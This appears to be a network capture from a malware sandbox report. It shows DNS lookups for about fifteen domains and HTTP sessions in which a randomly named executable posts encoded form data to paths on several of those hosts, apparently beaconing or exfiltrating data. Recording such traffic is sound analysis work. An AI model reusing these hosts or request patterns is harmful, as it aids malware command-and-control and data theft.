                    Sep 22, 2024 17:41:02.214943886 CEST5784253192.168.2.41.1.1.1
                    Sep 22, 2024 17:41:02.977054119 CEST53578421.1.1.1192.168.2.4
                    Sep 22, 2024 17:41:16.900048018 CEST5644453192.168.2.41.1.1.1
                    Sep 22, 2024 17:41:16.925827980 CEST53564441.1.1.1192.168.2.4
                    Sep 22, 2024 17:41:24.997777939 CEST6142853192.168.2.41.1.1.1
                    Sep 22, 2024 17:41:25.034785032 CEST53614281.1.1.1192.168.2.4
                    Sep 22, 2024 17:41:38.183232069 CEST6465253192.168.2.41.1.1.1
                    Sep 22, 2024 17:41:38.201168060 CEST53646521.1.1.1192.168.2.4
                    Sep 22, 2024 17:41:46.261848927 CEST5176053192.168.2.41.1.1.1
                    Sep 22, 2024 17:41:46.320097923 CEST53517601.1.1.1192.168.2.4
                    Sep 22, 2024 17:41:59.462465048 CEST5555853192.168.2.41.1.1.1
                    Sep 22, 2024 17:41:59.503550053 CEST53555581.1.1.1192.168.2.4
                    Sep 22, 2024 17:42:12.822113037 CEST6410453192.168.2.41.1.1.1
                    Sep 22, 2024 17:42:13.430124044 CEST53641041.1.1.1192.168.2.4
                    Sep 22, 2024 17:42:27.212754011 CEST5771353192.168.2.41.1.1.1
                    Sep 22, 2024 17:42:27.262769938 CEST53577131.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 22, 2024 17:39:45.755412102 CEST | 192.168.2.4 | 1.1.1.1 | 0x3456 | Standard query (0) | www.teksales.space | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:39:50.774844885 CEST | 192.168.2.4 | 1.1.1.1 | 0x5433 | Standard query (0) | www.linkbasic.net | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:39:55.807224989 CEST | 192.168.2.4 | 1.1.1.1 | 0xef40 | Standard query (0) | www.route4.org | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:40:12.666068077 CEST | 192.168.2.4 | 1.1.1.1 | 0xcb09 | Standard query (0) | www.meery.store | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:40:20.743695021 CEST | 192.168.2.4 | 1.1.1.1 | 0x32dc | Standard query (0) | www.subitoadomicilio.shop | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:40:34.369201899 CEST | 192.168.2.4 | 1.1.1.1 | 0xfc38 | Standard query (0) | www.syvra.xyz | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:40:47.838017941 CEST | 192.168.2.4 | 1.1.1.1 | 0x4ea4 | Standard query (0) | www.hm62t.top | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:02.214943886 CEST | 192.168.2.4 | 1.1.1.1 | 0x429a | Standard query (0) | www.zhuoyueapp.top | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:16.900048018 CEST | 192.168.2.4 | 1.1.1.1 | 0x8d42 | Standard query (0) | www.pelus-pijama-pro.shop | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:24.997777939 CEST | 192.168.2.4 | 1.1.1.1 | 0x4bf1 | Standard query (0) | www.autonashville.com | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:38.183232069 CEST | 192.168.2.4 | 1.1.1.1 | 0x9c56 | Standard query (0) | www.torkstallningar.shop | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:46.261848927 CEST | 192.168.2.4 | 1.1.1.1 | 0xcd98 | Standard query (0) | www.dom-2.online | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:59.462465048 CEST | 192.168.2.4 | 1.1.1.1 | 0x6fd7 | Standard query (0) | www.easyanalytics.site | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:12.822113037 CEST | 192.168.2.4 | 1.1.1.1 | 0xef48 | Standard query (0) | www.kalomor.top | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:27.212754011 CEST | 192.168.2.4 | 1.1.1.1 | 0x4ddf | Standard query (0) | www.loan-insurance.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 22, 2024 17:39:45.766796112 CEST | 1.1.1.1 | 192.168.2.4 | 0x3456 | Name error (3) | www.teksales.space | none | none | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:39:50.786655903 CEST | 1.1.1.1 | 192.168.2.4 | 0x5433 | Name error (3) | www.linkbasic.net | none | none | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:39:56.250032902 CEST | 1.1.1.1 | 192.168.2.4 | 0xef40 | No error (0) | www.route4.org | | 34.150.58.73 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:40:12.676693916 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb09 | Name error (3) | www.meery.store | none | none | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:40:20.924664021 CEST | 1.1.1.1 | 192.168.2.4 | 0x32dc | No error (0) | www.subitoadomicilio.shop | | 195.24.68.25 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:40:34.488867044 CEST | 1.1.1.1 | 192.168.2.4 | 0xfc38 | No error (0) | www.syvra.xyz | | 162.0.213.94 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:40:48.542540073 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ea4 | No error (0) | www.hm62t.top | hm62t.top | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:40:48.542540073 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ea4 | No error (0) | hm62t.top | | 154.23.184.240 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:02.977054119 CEST | 1.1.1.1 | 192.168.2.4 | 0x429a | No error (0) | www.zhuoyueapp.top | | 47.104.180.139 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:16.925827980 CEST | 1.1.1.1 | 192.168.2.4 | 0x8d42 | Name error (3) | www.pelus-pijama-pro.shop | none | none | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:25.034785032 CEST | 1.1.1.1 | 192.168.2.4 | 0x4bf1 | No error (0) | www.autonashville.com | autonashville.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:41:25.034785032 CEST | 1.1.1.1 | 192.168.2.4 | 0x4bf1 | No error (0) | autonashville.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:25.034785032 CEST | 1.1.1.1 | 192.168.2.4 | 0x4bf1 | No error (0) | autonashville.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:38.201168060 CEST | 1.1.1.1 | 192.168.2.4 | 0x9c56 | Name error (3) | www.torkstallningar.shop | none | none | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:46.320097923 CEST | 1.1.1.1 | 192.168.2.4 | 0xcd98 | No error (0) | www.dom-2.online | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:59.503550053 CEST | 1.1.1.1 | 192.168.2.4 | 0x6fd7 | No error (0) | www.easyanalytics.site | easyanalytics.site | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:41:59.503550053 CEST | 1.1.1.1 | 192.168.2.4 | 0x6fd7 | No error (0) | easyanalytics.site | | 162.241.226.190 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:13.430124044 CEST | 1.1.1.1 | 192.168.2.4 | 0xef48 | No error (0) | www.kalomor.top | kalomor.top | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:42:13.430124044 CEST | 1.1.1.1 | 192.168.2.4 | 0xef48 | No error (0) | kalomor.top | | 91.215.85.23 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:27.262769938 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ddf | No error (0) | www.loan-insurance.shop | loan-insurance.shop | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:42:27.262769938 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ddf | No error (0) | loan-insurance.shop | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 34.150.58.73 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
Timestamp | Bytes transferred | Direction | Data
Sep 22, 2024 17:39:56.272306919 CEST | 480 | OUT | GET /65ev/?_vft=vxWlbDi8ipa49jzp&6X=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.route4.org
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
Sep 22, 2024 17:39:57.205507040 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Sun, 22 Sep 2024 15:39:57 GMT
                    Content-Type: text/html
                    Content-Length: 58288
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: "6691ebc2-e3b0"
                    Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 195.24.68.25 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
Timestamp | Bytes transferred | Direction | Data
Sep 22, 2024 17:40:20.944772959 CEST | 763 | OUT | POST /x7sd/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.subitoadomicilio.shop
                    Origin: http://www.subitoadomicilio.shop
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.subitoadomicilio.shop/x7sd/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Ascii: 6X=8zK/CYulK3elMZg/XDtmJKc66fDfSiiBrefNTgI5IbbaKbiQfvZSij6kA6FY3Bk0W4Tv2lOk8mdDB0LTz2eOh/HjKNiV62lRGDrofCE/eNPYhFYfGfkCCCGPF7LEk5oCH3CNy76ZpOd4OU/99sJE5Fyt1DbmzsoEylJsVvXPMlSHs7dd2aY15pHT1XgXhr+EVw==
Sep 22, 2024 17:40:21.658854008 CEST | 591 | IN | HTTP/1.1 404 Not Found
                    Server: openresty
                    Date: Sun, 22 Sep 2024 15:40:21 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Content-Length: 424
                    Connection: close
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 195.24.68.25 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
Timestamp | Bytes transferred | Direction | Data
Sep 22, 2024 17:40:23.504281044 CEST | 783 | OUT | POST /x7sd/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.subitoadomicilio.shop
                    Origin: http://www.subitoadomicilio.shop
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.subitoadomicilio.shop/x7sd/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Ascii: 6X=8zK/CYulK3elN6I/VgVmOqc5mvDfZCi7reTNTkwXLuLaK7SQerNShj6kPaFZqxl6W4Wc2nak8m5DB1bTzHeNjvHtTdit+2lRGDrofGsVeNXYhVEfUukFKiGOALLEg5oeH3Cjy6nypM14OUP99+xH3FyvqzaD8uEP/1djKsTGGlKrp9MHnr5irpjgoQpjsoDNO4Tqi2bENdKCGXV8ONWHAh8=
Sep 22, 2024 17:40:24.215229034 CEST | 591 | IN | HTTP/1.1 404 Not Found
                    Server: openresty
                    Date: Sun, 22 Sep 2024 15:40:24 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Content-Length: 424
                    Connection: close
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 195.24.68.25 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
Timestamp | Bytes transferred | Direction | Data
Sep 22, 2024 17:40:26.042485952 CEST | 10865 | OUT | POST /x7sd/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.subitoadomicilio.shop
                    Origin: http://www.subitoadomicilio.shop
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.subitoadomicilio.shop/x7sd/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
Sep 22, 2024 17:40:26.891362906 CEST | 591 | IN | HTTP/1.1 404 Not Found
                    Server: openresty
                    Date: Sun, 22 Sep 2024 15:40:26 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Content-Length: 424
                    Connection: close
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 195.24.68.25 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
Timestamp | Bytes transferred | Direction | Data
Sep 22, 2024 17:40:28.588864088 CEST | 491 | OUT | GET /x7sd/?6X=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.subitoadomicilio.shop
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
Sep 22, 2024 17:40:29.297085047 CEST | 591 | IN | HTTP/1.1 404 Not Found
                    Server: openresty
                    Date: Sun, 22 Sep 2024 15:40:29 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Content-Length: 424
                    Connection: close
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 162.0.213.94 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
Timestamp | Bytes transferred | Direction | Data
Sep 22, 2024 17:40:34.508917093 CEST | 727 | OUT | POST /h2bb/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.syvra.xyz
                    Origin: http://www.syvra.xyz
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.syvra.xyz/h2bb/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Ascii: 6X=nLi3hk6LsWGq5Ghw8W4M5jVKh4tvioiopO9CzOsSZBxqOrycGMiY1B1d00I6HfVKh07LyguyJVMxjaduaxeyslCjVsCzwavOU31xiM3rksA2YHphfw9dSFwQpz1brTocS6TQXo9QWZ3hmHULGDTsIwBGpqjGse8fZ6cxhB4KOpNGX0UpX/vSonhM9H/sMfn+Mw==
Sep 22, 2024 17:40:35.188148022 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:40:35 GMT
                    Server: Apache
                    X-Frame-Options: SAMEORIGIN
                    Content-Length: 16052
                    X-XSS-Protection: 1; mode=block
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                    Sep 22, 2024 17:40:35.193464994 CEST1236INData Raw: 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 36 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31
                    Data Ascii: e-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;st


                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                    6          | 192.168.2.4 | 49743       | 162.0.213.94   | 80               | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:40:37.057132959 CEST | 747 | OUT | POST /h2bb/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.syvra.xyz
                    Origin: http://www.syvra.xyz
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.syvra.xyz/h2bb/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 6e 4c 69 33 68 6b 36 4c 73 57 47 71 72 31 70 77 36 31 51 4d 6f 54 56 4e 2f 6f 74 76 6f 49 69 73 70 4f 78 43 7a 4b 31 5a 61 33 42 71 50 4f 57 63 48 4a 4f 59 32 42 31 64 73 6b 49 2f 4a 2f 55 6e 68 30 32 2b 79 68 53 79 4a 56 49 78 6a 66 68 75 61 43 6d 78 74 31 43 39 5a 4d 43 39 2f 36 76 4f 55 33 31 78 69 4d 7a 42 6b 71 6f 32 59 58 5a 68 65 52 39 63 54 46 77 66 6a 54 31 62 68 44 6f 51 53 36 54 49 58 70 68 36 57 63 72 68 6d 47 6b 4c 47 33 48 74 42 77 41 50 6b 4b 69 45 67 65 5a 68 66 37 74 61 6b 7a 55 5a 48 4b 59 72 66 53 46 7a 47 4f 4f 46 36 6e 46 2f 67 41 32 59 42 63 61 33 58 78 4f 38 49 52 44 69 39 50 4c 54 72 78 31 66 41 46 6b 77 62 76 4d 3d
                    Data Ascii: 6X=nLi3hk6LsWGqr1pw61QMoTVN/otvoIispOxCzK1Za3BqPOWcHJOY2B1dskI/J/Unh02+yhSyJVIxjfhuaCmxt1C9ZMC9/6vOU31xiMzBkqo2YXZheR9cTFwfjT1bhDoQS6TIXph6WcrhmGkLG3HtBwAPkKiEgeZhf7takzUZHKYrfSFzGOOF6nF/gA2YBca3XxO8IRDi9PLTrx1fAFkwbvM=
                    Sep 22, 2024 17:40:37.650108099 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:40:37 GMT
                    Server: Apache
                    X-Frame-Options: SAMEORIGIN
                    Content-Length: 16052
                    X-XSS-Protection: 1; mode=block
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                    Sep 22, 2024 17:40:37.650151968 CEST224INData Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67
                    Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transfo
                    Sep 22, 2024 17:40:37.650216103 CEST1236INData Raw: 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 30 31 35 30 36 38 37 2c 30 2c 30 2c 31 31 2e 31 39 33 39 32 33 2c 2d 31 2e 33 38 39 35 39 34 35 2c 2d 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c
                    Data Ascii: rm="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263
                    Sep 22, 2024 17:40:37.650259972 CEST1236INData Raw: 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20
                    Data Ascii: e-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914
                    Sep 22, 2024 17:40:37.650301933 CEST1236INData Raw: 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74
                    Data Ascii: 475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433
                    Sep 22, 2024 17:40:37.650362968 CEST672INData Raw: 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                    Data Ascii: 46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.4
